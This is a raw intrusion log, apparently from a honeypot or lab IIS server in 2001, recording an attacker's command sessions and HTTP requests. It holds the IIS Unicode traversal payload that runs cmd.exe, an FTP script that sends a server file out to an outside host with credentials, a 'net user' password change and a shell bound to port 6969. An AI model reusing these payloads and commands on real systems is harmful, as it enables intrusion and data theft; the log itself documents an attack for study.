07:24p trojans 12/26/00 07:16p udp-exploits 12/26/00 07:15p ultrix-exploits 12/26/00 07:15p xwin-exploits 8 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits\unix> cd tcp-exploits C:\exploits\unix\tcp-exploits> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix\tcp-exploits 12/26/00 07:24p . 12/26/00 07:24p .. 03/23/98 10:26a 1,330 ALLHOSTS.C 03/23/98 10:26a 7,436 bounce.c 03/23/98 10:26a 4,841 CSIRCSEQ.C 03/23/98 10:26a 4,465 datapipe.c 03/23/98 10:26a 3,782 KILL-ME.C 03/23/98 10:26a 8,548 NNTPFORG.C 03/23/98 10:26a 9,372 SZ-SEQ.C 03/23/98 10:26a 5,924 TSPOOF.C 10 File(s) 45,698 bytes 1,690,259,968 bytes free C:\exploits\unix\tcp-exploits> type ALLHOSTS.C ............ C:\exploits\unix\tcp-exploits> dir again type CSIRCSEQ.C ............ C:\exploits\unix\tcp-exploits> cd .. C:\exploits\unix> cd .. C:\exploits> cd .. C:\> dir again type README.NOW.Hax0r Hi, i know that this a is a lab server, but patch the holes! :-) C:\> cd Program Files C:\Program Files> dir again cd Program Files C:\Program Files> dir again cd .. C:\> cd Inetpub C:\InetPub> dir again cd wwwroot C:\InetPub\wwwroot> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:15a . 02/04/01 07:15a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 23 File(s) 42,748 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> 14:33:37 session #1 RDS net user IWAM_KENNY Snake69Snake69 14:34:20 session #2 echo test > test.txt C:\InetPub\wwwroot> 15:34:26.673973 requested by 212.187.36.4 (arnink00.chello.nl) a proxy, which according to the request header forwarded the request for 213.46.45.28 (d45028.upc-d.chello.nl) 15:35:13.234041 session #1 213.116.251.162 sends 4 icmp: echo request NO ECHO REPLY?! 14:35:26 session #2 echo this can't be true > test.txt C:\InetPub\wwwroot> type test.txt this can't be true C:\InetPub\wwwroot> 14:36:02 session #1 requests test.txt via http 15:37:22.484792 213.46.45.28 requests test.txt via http (direct request, no proxy) 15:38:11.166927 213.48.120.242 (cache-haw-e3a.cableinet.net) requests test.txt for 194.117.146.52 (usr42-haw.cableinet.co.uk) 15:38:20.095797 194.126.101.110 (cache3.estpak.ee) requests test.txt for 213.168.4.30 (adsl3584.estpak.ee) 15:39:12.279693 213.93.39.186 (e39186.upc-e.chello.nl) requests test.txt 15:39:22.599574 24.43.44.7 (cr602951-a.lndn1.on.wave.home.com) requests test.txt 15:39:55.840177 198.142.92.196 (perax6-196.dialup.optusnet.com.au) requests test.txt 15:40:26.971956 session #2 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:33a . 02/04/01 07:33a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 02/04/01 07:34a 21 test.txt 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 42,769 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> cd .. C:\InetPub> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub 12/07/00 03:30p . 12/07/00 03:30p .. 11/26/00 12:40p ftproot 11/26/00 12:40p gophroot 12/07/00 03:31p iissamples 11/26/00 12:40p scripts 02/04/01 07:33a wwwroot 7 File(s) 0 bytes 1,690,259,968 bytes free C:\InetPub> cd .. c:\> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:34a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> rmdir test C:\> 15:42:58.763752 62.153.22.63 (p3E99163F.dip.t-dialin.net) requests test.txt 15:44:44.190843 213.245.4.107 (cha213245004107.chello.fr) requests test.txt 15:45:00.501753 session #2 cd inetpub/wwwroot C:\InetPub> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub 12/07/00 03:30p . 12/07/00 03:30p .. 11/26/00 12:40p ftproot 11/26/00 12:40p gophroot 12/07/00 03:31p iissamples 11/26/00 12:40p scripts 02/04/01 07:33a wwwroot 7 File(s) 0 bytes 1,690,259,968 bytes free C:\InetPub> cd wwwroot C:\InetPub\wwwroot> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:33a . 02/04/01 07:33a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 02/04/01 07:34a 21 test.txt 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 42,769 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> copy default.htm default.html 1 file(s) copied. C:\InetPub\wwwroot> echo . >>default.htm C:\InetPub\wwwroot> 15:46:08.307092 212.187.36.4 retrieves default.htm for 213.46.45.28 (d45028.upc-d.chello.nl) the trailing dot is there 15:46:34.767365 62.153.22.63 (p3E99163F.dip.t-dialin.net) retrieves test.txt 15:50:27.493952 session #1 UNICODE GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe copies C:\winnt\system32\cmd.exe The process cannot access the file because it is being used by another process. 0 file(s) copied. 15:50:31.383948 session #2 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:34a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 16 File(s) 78,648,956 bytes 1,690,258,432 bytes free C:\> 15:50:37.059000 session #1 UNICODE /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1 builds a new ftp command script named ftpcom, overwriting the old one open 213.116.251.162 johna2k haxedj00 put c:\wiretrip\whisker.tar.gz quit UNICODE ftp -s:ftpcom 220--------H-A-C-K T-H-E P-L-A-N-E-T-------- 220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r. 220-Featuring 100% elite hax0r warez!@$#@ 220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram. 220 -------H-A-C-K T-H-E P-L-A-N-E-T-------- Login ok, sends file 15:51:32.707281 ... 226 Transfer complete. 221 Buh bye, you secksi hax0r j00 :] 15:53:30.042564 UNICODE del ftpcom 15:51:52.815837 session #1 UNICODE binds a new shell to port 6969 15:52:24.859950 204.137.229.4 (nemean.spikeman.net) requests test.txt for an intranet client 15:56:24.300390 64.219.144.66 (ppp-64-219-144-66.dialup.hrlntx.swbell.net) requests test.txt 15:59:18.752777 213.64.51.77 (h77n2fls20o70.telia.com) requests test.txt 16:18:29.598100 193.253.209.220 (ANeuilly-101-1-3-220.abo.wanadoo.fr) requests test.txt